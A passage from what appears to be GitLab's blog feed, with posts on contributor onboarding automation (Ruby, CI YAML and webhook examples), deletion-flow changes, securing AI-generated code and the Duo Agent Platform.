<p><strong>GitLab Duo Agent Platform CLI:</strong> Our upcoming CLI will allow you to invoke agents and trigger Flows on the command line, leveraging GitLab's rich context across the entire software development lifecycle—from code repositories and merge requests to CI/CD pipelines and issue tracking.</p>
</li>
</ul>
<h2>Get started now</h2>
<ul>
<li>
<p><strong>GitLab Premium and Ultimate customers</strong> in GitLab.com and self-managed environments using GitLab 18.2 can use Duo Agent Platform immediately (beta and experimental features for GitLab Duo <a href="https://docs.gitlab.com/user/gitlab_duo/turn_on_off/#turn-on-beta-and-experimental-features">must be enabled</a>). GitLab Dedicated customers will be able to use the Duo Agent Platform with the release of GitLab 18.2 for Dedicated next month.</p>
</li>
<li>
<p>Users should download the <a href="https://marketplace.visualstudio.com/items?itemName=GitLab.gitlab-workflow">VS Code extension</a> or the <a href="https://plugins.jetbrains.com/plugin/22857-gitlab">JetBrains IDEs plugin</a> and follow our <a href="https://docs.gitlab.com/user/gitlab_duo_chat/agentic_chat/#use-agentic-chat">guide to using GitLab Duo Agentic Chat</a>, including Duo Chat <a href="https://docs.gitlab.com/user/gitlab_duo_chat/examples/#gitlab-duo-chat-slash-commands">slash commands</a>.</p>
</li>
</ul>
<p><strong>New to GitLab?</strong> See GitLab Duo Agent Platform in action at our Technical Demo, offered in two timezone-friendly sessions: <a href="https://page.gitlab.com/webcasts-jul16-gitlab-duo-agentic-ai-emea-amer.html">Americas and EMEA</a> and <a href="https://page.gitlab.com/webcasts-jul24-gitlab-duo-agentic-ai-apac.html">Asia-Pacific</a>. To get hands-on with GitLab Duo Agent Platform yourself, sign up for a <a href="https://gitlab.com/-/trials/new?glm_content=default-saas-trial&amp;glm_source=about.gitlab.com%2Fsales%2F">free trial</a> today.</p>
<p>&lt;small&gt;<em>This blog post contains “forward-looking statements” within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in the forward-looking statements contained in this blog post are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to be materially different from any future results or outcomes expressed or implied by the forward-looking statements.</em></p>
<p><em>Further information on risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this blog post are included under the caption “Risk Factors” and elsewhere in the filings and reports we make with the Securities and Exchange Commission. We do not undertake any obligation to update or release any revisions to any forward-looking statement or to report any events or circumstances after the date of this blog post or to reflect the occurrence of unanticipated events, except as required by law.</em>&lt;/small&gt;</p>
]]></content>
        <author>
            <name>Bill Staples</name>
            <uri>https://about.gitlab.com/blog/authors/bill-staples</uri>
        </author>
        <published>2025-07-17T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[How we use GitLab to grow open source communities]]></title>
        <id>https://about.gitlab.com/blog/how-we-use-gitlab-to-grow-open-source-communities/</id>
        <link href="https://about.gitlab.com/blog/how-we-use-gitlab-to-grow-open-source-communities/"/>
        <updated>2025-07-15T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab's Contributor Success team faced a challenge.
While our returning open source contributors were merging more code changes and collaborating on deeper features, first-time contributors were struggling to get started. We knew many newcomers to open source often gave up or never asked for help. But as advocates for <a href="https://handbook.gitlab.com/handbook/company/mission/">GitLab's mission</a>
to enable everyone to contribute, we wanted to do better.</p>
<p>We started running research studies with open source contributors to GitLab. Then we set about removing the stumbling blocks they uncovered. In January, we achieved a record of 184 unique community contributors to GitLab in a single month,
exceeding our team target of 170 for the first time.</p>
<p>Three months later, we broke it again with 192.</p>
<p>Here's how we used GitLab's own tools to solve the newcomer dilemma and grow our open source community.</p>
<h2>What we learned studying first-time contributors</h2>
<p>In 2023, we conducted the first-ever user study of GitLab open source contributors.
We watched six participants who had never contributed to GitLab make their first attempt. They completed diary studies and Zoom interviews detailing their experience.</p>
<p>Participants told us:</p>
<ul>
<li>The contributor documentation was confusing</li>
<li>Getting started felt overwhelming</li>
<li>It wasn't clear how or where to find help</li>
</ul>
<p>Only one out of the six participants successfully merged a code contribution to GitLab during the study.</p>
<p>It became clear we needed to focus on the onboarding experience if we wanted new contributors to succeed.
So we <a href="https://handbook.gitlab.com/handbook/values/#iteration">iterated</a>!</p>
<p>Our team spent the next year addressing their challenges. We used GitLab tools,
such as issue templates, scheduled pipelines, webhooks, and the GitLab Query Language (GLQL), to build an innovative semi-automated onboarding solution.</p>
<p>In 2025, we performed a follow-up user study with new participants who had never made a contribution to GitLab. All 10 participants successfully created and merged contributions to GitLab, a 100% success rate. The feedback showed great appreciation for the new onboarding process, the speed at which
maintainers checked in on contributors, and the recognition we offered them.</p>
<p>Even better, participants shared how much fun they had contributing:
&quot;I felt a little rush of excitement at being able to say 'I helped build GitLab.'&quot;</p>
<h2>We built personal onboarding with GitLab</h2>
<p>Our solution started with engagement.
To help newcomers get started, we introduced a personal onboarding process connecting each
contributor with a community maintainer.</p>
<p>We created an <a href="https://gitlab.com/gitlab-community/meta/-/blob/ac0e5579a6a1cf26e367010bfcf6c7d35b38d4f8/.gitlab/issue_templates/Onboarding.md">issue template</a> with a clear checklist of tasks.</p>
<p>The onboarding issue also handles access approval for the
<a href="https://about.gitlab.com/blog/gitlab-community-forks/">GitLab community forks</a>,
a collection of shared projects that make it easier to push changes, collaborate with others,
and access GitLab Ultimate and Duo features.</p>
<p>Using <a href="https://docs.gitlab.com/user/project/labels/#scoped-labels">scoped labels</a>, we indicate the status of the access request for easy maintainer follow-ups.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/vkiyl0hrfbgcer3nz38r.png" alt="GitLab onboarding issue"></p>
<p>We started with a Ruby script run via a <a href="https://docs.gitlab.com/ci/pipelines/schedules/">scheduled pipeline</a>,
checking for new access requests and using the issue template to create personalized onboarding issues.</p>
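<p>As a rough sketch of that scheduled job (the endpoint is GitLab's documented <code>GET /groups/:id/access_requests</code>; the issue fields, label, and <code>%{username}</code> placeholder here are illustrative, not the real script):</p>

```ruby
require "net/http"
require "json"
require "uri"

API = "https://gitlab.com/api/v4"

# GET /groups/:id/access_requests lists pending access requests for a group.
def access_requests_uri(group_id)
  URI("#{API}/groups/#{group_id}/access_requests")
end

# Render a personalized onboarding issue from the issue template body.
# The %{username} placeholder is an illustrative convention.
def onboarding_issue(template, username)
  {
    title: "Onboarding: @#{username}",
    description: template.gsub("%{username}", username),
    labels: "onboarding"
  }
end

# Only touch the network when a token is configured, as in the pipeline.
if ENV["GITLAB_API_TOKEN"]
  request = Net::HTTP::Get.new(access_requests_uri(ENV.fetch("GROUP_ID")))
  request["PRIVATE-TOKEN"] = ENV["GITLAB_API_TOKEN"]
  # ...parse the JSON response and POST /projects/:id/issues for each request
end
```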
<p>From here, our maintainers engage with new contributors to verify access, answer questions, and find issues.</p>
<h2>We standardized responses with comment templates</h2>
<p>With multiple maintainers in the GitLab community, we wanted to ensure consistent and clear messaging.</p>
<p>We created <a href="https://docs.gitlab.com/user/profile/comment_templates/">comment templates</a>,
which we sync with the repository using the GraphQL API and a
<a href="https://gitlab.com/gitlab-community/meta/-/blob/dd6e0c2861c848251424b72e3e8c5603dcaac725/bin/sync_comment_templates.rb">Ruby script</a>.</p>
<p>The script is triggered in <code>.gitlab-ci.yml</code> when comment template changes are pushed
to the default branch (a dry run is triggered in merge requests).</p>
<pre><code class="language-yaml">execute:sync-comment-templates:
  stage: execute
  extends: .ruby
  script:
    - bundle exec bin/sync_comment_templates.rb
  variables:
    SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_ONLY
  rules:
    - if: $CI_PIPELINE_SOURCE == 'schedule' || $CI_PIPELINE_SOURCE == &quot;trigger&quot;
      when: never
    - if: $EXECUTE_SYNC_COMMENT_TEMPLATES == '1'
    - if: $CI_MERGE_REQUEST_IID
      changes:
        - .gitlab/comment_templates/**/*
      variables:
        REPORT_ONLY: 1
    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH
      changes:
        - .gitlab/comment_templates/**/*
      variables:
        FORCE_SYNC: 1
        DRY_RUN: 0
        SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_WRITE
</code></pre>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/qmfaymqhq3zgdcnm6a3j.png" alt="GitLab comment template"></p>
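<p>The Ruby side of that sync can be sketched like this (the file-naming convention and dry-run handling are assumptions for illustration; the linked script is the source of truth):</p>

```ruby
require "pathname"

TEMPLATE_DIR = ".gitlab/comment_templates"

# Map a template file to the name/content pair the sync sends to the API.
# Assumed convention: the file's basename (minus .md) is the template name.
def template_from(path, content)
  { name: Pathname(path).basename(".md").to_s, content: content }
end

# Mirror the CI variables above: stay in report-only mode unless DRY_RUN
# is explicitly turned off and REPORT_ONLY is not set.
def report_only?(env = ENV)
  env["REPORT_ONLY"] == "1" || env["DRY_RUN"] != "0"
end

if ENV["SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN"]
  Dir.glob("#{TEMPLATE_DIR}/**/*.md").each do |path|
    template = template_from(path, File.read(path))
    puts "#{report_only? ? 'would sync' : 'syncing'}: #{template[:name]}"
    # ...call the GraphQL API here to create or update the comment template
  end
end
```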
<h2>We eliminated the 5-minute wait time</h2>
<p>Our first iteration was a little slow.
After starting the onboarding process, contributors wondered what to do next while the scheduled
pipeline took up to 5 minutes to create their onboarding issue.
Five minutes feels like forever when you have the momentum to dive in.</p>
<p><a href="https://gitlab.com/Taucher2003">Niklas</a>, a member of our <a href="https://about.gitlab.com/community/core-team/">Core team</a>, built a solution.
He added <a href="https://gitlab.com/gitlab-org/gitlab/-/merge_requests/163094">webhook events for access requests</a>
and <a href="https://gitlab.com/gitlab-org/gitlab/-/merge_requests/142738">custom payload templates for webhooks</a>.</p>
<p>Together, these features allowed us to trigger a pipeline immediately instead of waiting for the schedule.
This reduced the wait to roughly 40 seconds (the time it takes for the CI pipeline to run),
so the onboarding issue is generated right away. It also saves thousands of wasted pipelines and compute minutes when no access requests actually need processing.</p>
<p>We set up a <a href="https://docs.gitlab.com/ci/triggers/#create-a-pipeline-trigger-token">pipeline trigger token</a>
and used this as the target for the webhook, passing the desired environment variables:</p>
<pre><code class="language-json">{
  &quot;ref&quot;: &quot;main&quot;,
  &quot;variables&quot;: {
    &quot;EXECUTE_ACCESS_REQUESTS&quot;: &quot;1&quot;,
    &quot;DRY_RUN&quot;: &quot;0&quot;,
    &quot;PIPELINE_NAME&quot;: &quot;Create onboarding issues&quot;,
    &quot;GROUP_ID&quot;: &quot;{{group_id}}&quot;,
    &quot;EVENT_NAME&quot;: &quot;{{event_name}}&quot;
  }
}
</code></pre>
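<p>Mechanically, each webhook delivery is equivalent to calling GitLab's documented pipeline trigger endpoint, <code>POST /projects/:id/trigger/pipeline</code>, where trigger variables are passed as <code>variables[NAME]</code> form fields. A minimal sketch (project ID and token are placeholders):</p>

```ruby
require "net/http"
require "uri"

# Build the form-encoded body for POST /projects/:id/trigger/pipeline.
# Trigger variables are passed as variables[NAME]=value form fields.
def trigger_params(token, ref, variables)
  params = { "token" => token, "ref" => ref }
  variables.each { |name, value| params["variables[#{name}]"] = value }
  params
end

if ENV["TRIGGER_TOKEN"]
  uri = URI("https://gitlab.com/api/v4/projects/#{ENV.fetch('PROJECT_ID')}/trigger/pipeline")
  response = Net::HTTP.post_form(uri, trigger_params(
    ENV["TRIGGER_TOKEN"], "main",
    "EXECUTE_ACCESS_REQUESTS" => "1", "DRY_RUN" => "0"
  ))
  puts response.code
end
```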
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512805/qom7hnqnwfcdzvria7dd.png" alt="Pipeline list"></p>
<h2>We automated follow-ups</h2>
<p>With an increasing volume of customers and community contributors onboarding to the GitLab community,
maintainers struggled to track which issues needed attention, and some follow-up questions got lost.</p>
<p>We built automation leveraging webhooks and Ruby to label issues updated by community members.
This creates a clear signal of issue status for maintainers.</p>
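<p>The labeling logic amounts to inspecting note webhook payloads and updating the issue when the commenter is not a maintainer. A hedged sketch (the label name, team list, and payload handling are illustrative, not the production script):</p>

```ruby
require "json"

# Illustrative label applied so maintainers can spot community activity.
COMMUNITY_LABEL = "community-update"

# Decide from a note webhook payload whether the issue needs follow-up:
# any comment authored by someone outside the maintainer team counts.
def community_update?(payload, team_usernames)
  return false unless payload["object_kind"] == "note"
  author = payload.dig("user", "username")
  !author.nil? && !team_usernames.include?(author)
end

if ENV["GITLAB_API_TOKEN"]
  payload = JSON.parse($stdin.read)
  if community_update?(payload, %w[maintainer_one maintainer_two])
    # PUT /projects/:id/issues/:iid with add_labels=COMMUNITY_LABEL
  end
end
```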
<p><a href="https://gitlab.com/gitlab-org/ruby/gems/gitlab-triage">GitLab Triage</a>
automatically nudges idle onboarding issues to ensure we maintain contributor momentum.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512811/gkj3qaidjl1vv2dlu8ep.png" alt="Automated nudge for idle GitLab onboarding issues"></p>
<h2>We organized issue tracking with GLQL</h2>
<p>We built a <a href="https://docs.gitlab.com/user/glql/">GLQL view</a> to keep track of issues.
This GLQL table summarizes onboarding issues that need attention,
so maintainers can review and follow up with community members.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/hdduf0orntdfhkysheae.png" alt="GLQL view of issue tracking"></p>
<p>These GLQL views improved our overall triage <a href="https://handbook.gitlab.com/handbook/values/#efficiency">efficiency</a>.
The approach was so successful that we ended up using it within the <a href="https://about.gitlab.com/solutions/open-source/">GitLab for Open Source</a>
and <a href="https://about.gitlab.com/solutions/education/">GitLab for Education</a> programs, too.
With GLQL tables for support issues, these community programs lowered their response times by 75%.</p>
<h2>We made the README findable</h2>
<p>The <a href="https://gitlab.com/gitlab-community/">@gitlab-community group</a>
is the home for contributors on GitLab.com.
We already had a <code>README.md</code> file explaining the community forks and onboarding process, but this file
lived in our meta project.
With our follow-up user study, we discovered this was a point of confusion for newcomers when their
onboarding issues were under a different project.</p>
<p>We used <a href="https://docs.gitlab.com/user/project/repository/mirror/">GitLab's project mirroring</a>
to solve this and mirrored the meta project to <code>gitlab-profile</code>.
This surfaced the existing README file at the group level, making it easier to discover.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512809/kbgdxyilza71kmj0aeqt.png" alt="GitLab project mirroring"></p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/taosgn8vvgo8onszuwaf.png" alt="Group README"></p>
<h2>The results speak for themselves</h2>
<p>By dogfooding GitLab, we removed the stumbling blocks surfaced in our research studies
and transformed the GitLab contributor journey.
We have grown the number of customers and community members contributing to GitLab,
adding features to the product, solving bugs, and adding to our CI/CD catalog.</p>
<p>Our onboarding process has increased the rate at which newcomers join the community, and our total number of
contributors on the community forks has doubled over the last 9 months.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/xagra4vfsrhbcwnzekmp.png" alt="Community forks growth chart"></p>
<p>We reduced the time it takes for newcomers to make their first contribution by connecting them
with maintainers faster and supporting them in getting started.
We use <a href="https://docs.gitlab.com/user/group/value_stream_analytics/">GitLab's value stream analytics</a>
to track our response rates.</p>
<ul>
<li>First response time from community maintainers is down to 46 minutes over the last 3 months</li>
<li>Average approval time for community forks access is down to 1 hour over the last 3 months</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512812/jzksakrfdb22hooqemzh.png" alt="Value stream analytics timeline"></p>
<p>The 100% success rate of our 2025 user study confirmed these improvements for our first-time contributors.</p>
<h2>We invested time savings into contributor recognition</h2>
<p>Fixing these newcomer challenges allowed us more capacity to focus on better recognition of
contributors, incentivizing first-timers to keep coming back.
The result is <a href="https://contributors.gitlab.com/">contributors.gitlab.com</a>.
We built out a central hub for our contributors that features gamified leaderboards,
achievements, and rewards.
Contributors can see their impact, track progress, and grow in the community.</p>
<h2>Sharing what we learned</h2>
<p>These improvements work and are repeatable for other open source projects.
We are sharing our approach across communities and conferences so that other projects can consider using these tools to grow.</p>
<p>As more organizations learn the barriers to participation, we can create a more welcoming open source environment.
With these GitLab tools, we can offer a smoother experience for both contributors and maintainers.
We're committed to advancing this work and collaborating to remove barriers for open source projects everywhere.</p>
<h2>Start the conversation</h2>
<p>Want to learn more about growing your contributor community?
Email <code>contributors@gitlab.com</code> or <a href="https://gitlab.com/gitlab-org/developer-relations/contributor-success/team-task/-/issues">open an issue</a>
to start a discussion.
We're here to help build communities.</p>
]]></content>
        <author>
            <name>Lee Tickett</name>
            <uri>https://about.gitlab.com/blog/authors/lee-tickett</uri>
        </author>
        <author>
            <name>Daniel Murphy</name>
            <uri>https://about.gitlab.com/blog/authors/daniel-murphy</uri>
        </author>
        <published>2025-07-15T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Improving GitLab's deletion flow: What to expect in coming months]]></title>
        <id>https://about.gitlab.com/blog/improving-gitlab-deletion-flow-what-to-expect-in-coming-months/</id>
        <link href="https://about.gitlab.com/blog/improving-gitlab-deletion-flow-what-to-expect-in-coming-months/"/>
        <updated>2025-07-14T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we're committed to continuously improving your experience across our platform. Today, we're excited to announce significant enhancements to our deletion flow for groups and projects. We are rolling out a series of improvements designed to protect your data, simplify recovery, and create a more intuitive experience across all pricing tiers.</p>
<h2>Why we're making these changes</h2>
<p>Our current deletion flow has some inconsistencies that can lead to frustrating experiences. Free tier users have had limited or no options for recovering accidentally deleted content, projects in personal namespaces haven't had the same protections as those in groups, and group namespace paths have remained locked after deletion, preventing immediate reuse.</p>
<p>We've heard your feedback, and we're addressing these pain points with a comprehensive redesign of our deletion flow that will be rolled out in multiple iterations.</p>
<h2>What has changed already</h2>
<p>Over the past quarter, we have implemented fundamental improvements to create a consistent deletion experience across all pricing tiers. These changes have eliminated the frustration of accidentally deleting important content with no recovery option.</p>
<ul>
<li><a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#deletion-protection-available-for-all-users"><strong>Pending deletion for all users</strong></a><strong>:</strong> All deleted projects and groups now enter a &quot;pending deletion&quot; state before being permanently deleted, regardless of their pricing tier.</li>
<li><a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#delayed-project-deletion-for-user-namespaces"><strong>Self-service recovery</strong></a><strong>:</strong> You can now restore your own content without contacting support, giving you more control and autonomy over your data.</li>
<li><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/502234"><strong>Clear status indicators</strong></a><strong>:</strong> We have standardized how deletion status is displayed across the platform, making it immediately clear when content is pending deletion.</li>
<li><strong>Extended recovery window:</strong> On July 10, 2025, we increased the pending deletion period from 7 to 30 days on GitLab.com. This means you now have ample time to recover from accidental deletions.</li>
</ul>
<h2>What's coming next</h2>
<h3>Currently in development</h3>
<p>Building on the foundation established in our first iteration, we are further enhancing your deletion experience with two key improvements:</p>
<ul>
<li><a href="https://gitlab.com/groups/gitlab-org/-/epics/17372"><strong>Admin area consistency</strong></a><strong>:</strong> Deletions initiated from the Admin area will follow the same pending deletion process as deletions initiated directly from the group or project level, creating a unified experience across all access points.</li>
<li><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/526081"><strong>Immediate path reuse</strong></a><strong>:</strong> When you delete a project or group, its namespace path will be automatically renamed, allowing you to immediately reuse the original path for new content. This will remove the waiting period currently required to reuse namespace paths.</li>
</ul>
<h3>Planned for future release</h3>
<p>The final phase will introduce a redesigned deletion experience that completes our vision for a modern, intuitive deletion system:</p>
<ul>
<li><strong>Centralized &quot;Trash&quot; interface:</strong> All your deleted content will be accessible in a dedicated &quot;Trash&quot; section, providing a familiar paradigm similar to what you're used to in other applications.</li>
<li><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/541182"><strong>Clear action separation</strong></a><strong>:</strong> We will create a clear distinction between &quot;Delete&quot; (temporary, recoverable) and &quot;Delete Permanently&quot; (irrevocable) actions to prevent accidental data loss.</li>
<li><strong>Bulk management:</strong> You'll be able to restore or permanently delete multiple items at once, making cleanup and recovery more efficient.</li>
</ul>
<h2>How these changes benefit you</h2>
<p>These enhancements deliver several key benefits that will transform your experience with GitLab's deletion functionality.</p>
<ul>
<li>
<p><strong>Protection against data loss</strong> is provided through pending deletion and self-service recovery available across all tiers, giving you a safety net against accidental deletions. The <strong>consistent experience</strong> ensures the same deletion flow applies to all projects and groups, eliminating inconsistencies across the platform.</p>
</li>
<li>
<p>You'll gain <strong>greater control</strong> through enhanced visibility and management options for deleted content, with a familiar interface that makes recovery intuitive. <strong>Improved workflow</strong> efficiency will result from immediate path reuse and bulk management capabilities that streamline your content organization process.</p>
</li>
<li>
<p>Most importantly, you'll have <strong>peace of mind</strong> knowing that the extended 30-day recovery window ensures ample opportunity to recover important data, while the clear separation between temporary and permanent deletion actions prevents accidental data loss.</p>
</li>
</ul>
<h2>Your feedback matters</h2>
<p>As always, we value your input. Please leave feedback in <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/538165">the feedback issue</a>.</p>
]]></content>
        <author>
            <name>Christina Lohr</name>
            <uri>https://about.gitlab.com/blog/authors/christina-lohr</uri>
        </author>
        <published>2025-07-14T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[3 best practices for building software in the era of LLMs]]></title>
        <id>https://about.gitlab.com/blog/3-best-practices-for-building-software-in-the-era-of-llms/</id>
        <link href="https://about.gitlab.com/blog/3-best-practices-for-building-software-in-the-era-of-llms/"/>
        <updated>2025-07-10T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>AI has rapidly become a core part of modern software development. Not only is it helping developers code faster than ever, but it’s also automating low-level tasks like writing test cases or summarizing documentation. According to our <a href="https://about.gitlab.com/developer-survey/">2024 Global DevSecOps Survey</a>, 81% of developers are already using AI in their workflows or plan to in the next two years.</p>
<p>As code is written with less manual effort, we’re seeing a subtle but important behavioral change: Developers are beginning to trust AI-generated code with less scrutiny. That confidence — understandable as it may be — can quietly introduce security risks, especially as the overall volume of code increases. Developers can’t be expected to stay on top of every vulnerability or exploit, which is why we need systems and safeguards that scale with them. AI tools are here to stay. So, as security professionals, it’s incumbent on you to empower developers to adopt them in a way that improves both speed and security.</p>
<p>Here are three practical ways to do that.</p>
<h2>Never trust, always verify</h2>
<p>As mentioned above, developers are beginning to trust AI-generated code more readily, especially when it looks clean and compiles without error. To combat this, adopt a zero-trust mindset. While we often talk about <a href="https://about.gitlab.com/blog/why-devops-and-zero-trust-go-together/">zero trust</a> in the context of identity and access management, the same principle can be applied here with a slightly different framing. Treat AI-generated code like input from a junior developer: helpful, but not production-ready without a proper review.</p>
<p>A developer should be able to explain what the code is doing and why it’s safe before it gets merged. Reviewing AI-generated code might even shape up to be an emerging skillset required in the world of software development. The developers who excel at this will be indispensable because they’ll marry the speed of LLMs with the risk reduction mindset to produce secure code, faster.</p>
<p>This is where tools like <a href="https://docs.gitlab.com/user/project/merge_requests/duo_in_merge_requests/">GitLab Duo Code Review</a> can help. As a feature of our AI companion across the software development lifecycle, it brings AI into the code review process, not to replace human judgment, but to enhance it. By surfacing questions, inconsistencies, and overlooked issues in the merge requests, AI can help developers keep up with the very AI that’s accelerating development cycles.</p>
<h2>Prompt for secure patterns</h2>
<p>Large language models (<a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">LLMs</a>) are powerful, but only as precise as the prompts they’re given. That’s why prompt engineering is becoming a core part of working with AI tools. In the world of LLMs, your input <em>is</em> the interface. Developers who learn to write clear, security-aware prompts will play a key role in building safer software from the start.</p>
<p>For example, vague requests like “build a login form” often produce insecure or overly simplistic results. However, by including more context, such as “build a login form <strong>with</strong> input validation, rate limiting, and password hashing, <strong>and</strong> support phishing-resistant authentication methods like passkeys,” you’re more likely to produce an output that meets the security standards of your organization.</p>
<p>Recent <a href="https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted">research</a> from Backslash Security backs this up. They found that secure prompting improved results across popular LLMs. When developers simply asked models to “write secure code,” success rates remained low. However, when prompts referenced <a href="https://cheatsheetseries.owasp.org/cheatsheets/LLM_Prompt_Injection_Prevention_Cheat_Sheet.html">OWASP best practices</a>, the rate of secure code generation increased.</p>
<p>Prompt engineering should be part of how we train and empower security champions within development teams. Just like we teach secure coding patterns and threat modeling, we should also be teaching developers how to guide AI tools with the same security mindset.</p>
<blockquote>
<p>Learn more with these helpful <a href="https://docs.gitlab.com/development/ai_features/prompt_engineering/">prompt engineering tips</a>.</p>
</blockquote>
<h2>Scan everything, no exceptions</h2>
<p>The rise of AI means we’re writing more code, quicker, with the same number of humans. That shift should change how we think about security, not just as a final check, but as an always-on safeguard woven into every aspect of the development process.</p>
<p>More code means a wider attack surface. And when that code is partially or fully generated, we can’t solely rely on secure coding practices or individual intuition to spot risks. That’s where automated scanning comes in. <a href="https://docs.gitlab.com/user/application_security/sast/">Static Application Security Testing (SAST)</a>, <a href="https://docs.gitlab.com/user/application_security/dependency_scanning/">Software Composition Analysis (SCA)</a>, and <a href="https://docs.gitlab.com/user/application_security/secret_detection/">Secret Detection</a> become critical controls to mitigate the risk of secret leaks, supply chain attacks, and weaknesses like SQL injections. With platforms like GitLab, <a href="https://about.gitlab.com/solutions/security-compliance/">application security</a> is natively built into the developer's workflow, making it a natural part of the development lifecycle. Scanners can also trace through the entire program to make sure new AI-generated code is secure <em>in the context of all the other code</em> — that can be hard to spot if you’re just looking at some new code in your IDE or in an AI-generated patch.</p>
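<p>Wiring these scanners in is mostly declarative. As a rough sketch (the template paths below are assumptions; verify the exact names against the documentation for your GitLab version), enabling all three can be a single <code>include</code> block:</p>
<pre><code class="language-yaml">
# Sketch: enable GitLab-managed security scanning.
# Template names are assumptions; check your GitLab version's docs.
include:
  - template: Jobs/SAST.gitlab-ci.yml
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml
</code></pre>
<p>Because the managed templates attach to the pipeline on every push by default, this gets you most of the way to the “every commit, every branch” posture with almost no pipeline code to maintain.</p>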
<p>But it’s not just about scanning, it’s about keeping pace. If development teams are going to match the speed of AI-assisted development, they need scans that are fast, accurate, and built to scale. Accuracy especially matters. If scanners overwhelm developers with false positives, there’s a risk of losing trust in the system altogether.</p>
<p>The only way to move fast <em>and</em> stay secure is to make scanning non-negotiable.</p>
<p>Every commit. Every branch. No exceptions.</p>
<h2>Secure your AI-generated code with GitLab</h2>
<p>AI is changing the way we build software, but the fundamentals of secure software development still apply. Code still needs to be reviewed. Threats still need to be tested. And security still needs to be embedded in the way we work. At GitLab, that’s exactly what we’ve done.</p>
<p>As a developer platform, we’re not bolting security onto the workflow — we’re embedding it directly where developers already work: in the IDE, in merge requests, and in the pipeline. Scans run automatically and relevant security context is surfaced to facilitate faster remediation cycles. And, because it’s part of the same platform where developers build, test, and deploy software, there are fewer tools to juggle, less context switching, and a much smoother path to secure code.</p>
<p>AI features like <a href="https://about.gitlab.com/the-source/ai/understand-and-resolve-vulnerabilities-with-ai-powered-gitlab-duo/">Duo Vulnerability Explanation and Vulnerability Resolution</a> add another layer of speed and insight, helping developers understand risks and fix them faster, without breaking their flow.</p>
<p>AI isn’t a shortcut to security. But with the right practices — and a platform that meets developers where they are — it can absolutely be part of building software that’s fast, secure, and scalable.</p>
<blockquote>
<p>Start your <a href="https://about.gitlab.com/free-trial/">free 60-day trial of GitLab Ultimate with Duo Enterprise</a> and experience what it’s like to build secure software, faster. With native security scanning, AI-powered insights, and a seamless developer experience, GitLab helps you shift security left without slowing down.</p>
</blockquote>
]]></content>
        <author>
            <name>Salman Ladha</name>
            <uri>https://about.gitlab.com/blog/authors/salman-ladha</uri>
        </author>
        <published>2025-07-10T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Accelerate learning with GitLab Duo Agent Platform]]></title>
        <id>https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/</id>
        <link href="https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we continue to expand our AI capabilities, so I often find myself learning and working in new codebases. Whether I'm debugging issues, implementing new features, or onboarding to different projects, understanding system architecture quickly is crucial. But let's be honest — manually tracing through complex communication flows, especially gRPC connections, can eat up hours of productive development time.</p>
<p>This is exactly the type of tedious, yet necessary, work <a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform</a> is designed to handle. Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.</p>
<p>Let me show you how I used <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform</a> to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.</p>
<p>You can follow along with this video:</p>
<div style="padding:75% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1098569263?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>
<h2>The challenge: Understanding gRPC communication flows</h2>
<p>I was working with a project called &quot;Duo Workflow Executor&quot; that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.</p>
